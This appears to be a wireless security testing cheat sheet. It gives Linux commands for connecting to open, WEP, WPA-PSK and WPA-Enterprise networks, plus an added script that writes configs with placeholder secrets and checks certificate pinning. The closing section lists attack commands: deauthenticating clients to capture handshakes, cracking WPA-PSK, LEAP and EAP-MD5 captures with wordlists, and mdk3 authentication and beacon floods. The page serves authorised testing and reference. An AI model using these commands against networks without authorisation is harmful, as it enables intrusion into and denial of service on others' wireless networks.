Wireless

Frequency chart

FCC ID lookup

https://apps.fcc.gov/oetcf/eas/reports/GenericSearch.cfm

Database of frequencies

http://www.radioreference.com/apps/db/

Source of Kismet

Wi-Fi commands in Linux

Connect to an insecure network

iwconfig ath0 essid $SSID
ifconfig ath0 up
dhclient ath0

Connect to WEP

iwconfig ath0 essid $SSID key $KEY
ifconfig ath0 up
dhclient ath0

Connect to WPA-PSK

iwconfig ath0 essid $SSID
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-psk.conf
dhclient ath0

Connect to WPA-Enterprise

iwconfig ath0 essid $SSID
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-ent.conf
dhclient ath0
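
The wpa_supplicant commands above load wpa-psk.conf and wpa-ent.conf, which this page does not show. The following is an added example, not part of the original page: it writes both files with owner-only permissions and checks that the enterprise profile validates the RADIUS server certificate. Every SSID, identity, secret, certificate path and function name in it is a constructed placeholder.

```shell
#!/bin/sh
# Added example. All values inside the configs are constructed placeholders.

write_psk_conf() {   # $1 = output path, e.g. wpa-psk.conf
    ( umask 077      # file holds a secret: create it as mode 600
      cat > "$1" <<'EOF'
network={
    ssid="ExampleSSID"
    key_mgmt=WPA-PSK
    psk="example-passphrase"
}
EOF
    )
}

write_ent_conf() {   # $1 = output path, e.g. wpa-ent.conf
    ( umask 077
      cat > "$1" <<'EOF'
network={
    ssid="ExampleCorp"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="user@example.com"
    password="example-password"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/example-radius-ca.pem"
    domain_suffix_match="radius.example.com"
}
EOF
    )
}

# Return 0 only if the enterprise config pins the authentication server.
# Without ca_cert the server certificate is not verified at all; without a
# name match any certificate issued by that CA is accepted.
lint_ent_conf() {    # $1 = config path
    grep -Eq '^[[:space:]]*ca_cert=' "$1" \
        || { echo "$1: missing ca_cert" >&2; return 1; }
    grep -Eq '^[[:space:]]*(domain_suffix_match|domain_match|altsubject_match|subject_match)=' "$1" \
        || { echo "$1: missing server name match" >&2; return 1; }
    return 0
}
```

Run lint_ent_conf wpa-ent.conf before passing the file to wpa_supplicant; a non-zero exit means the profile would accept an unverified server.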

Bluetooth on Linux

Testing Wi-Fi networks in Linux

Start monitor mode interface

airmon-ng stop ath0
airmon-ng start wifi0
iwconfig ath0 channel $CH

Capture client handshake attack

airodump-ng -c $CH --bssid $AP -w file ath0 #Capture traffic
aireplay-ng -0 10 -a $AP -c $CLIENT ath0 #Force client de-auth (-c takes the client MAC)

Brute force handshake attack

aircrack-ng -w wordlist capture.cap # WPA-PSK
asleap -r capture.cap -w dict.asleap # LEAP
eapmd5pass -r capture.cap -w wordlist # EAP-MD5


DoS attack

mdk3 int a -a $AP #Auth Flood
mdk3 int b -c $CH #Beacon Flood
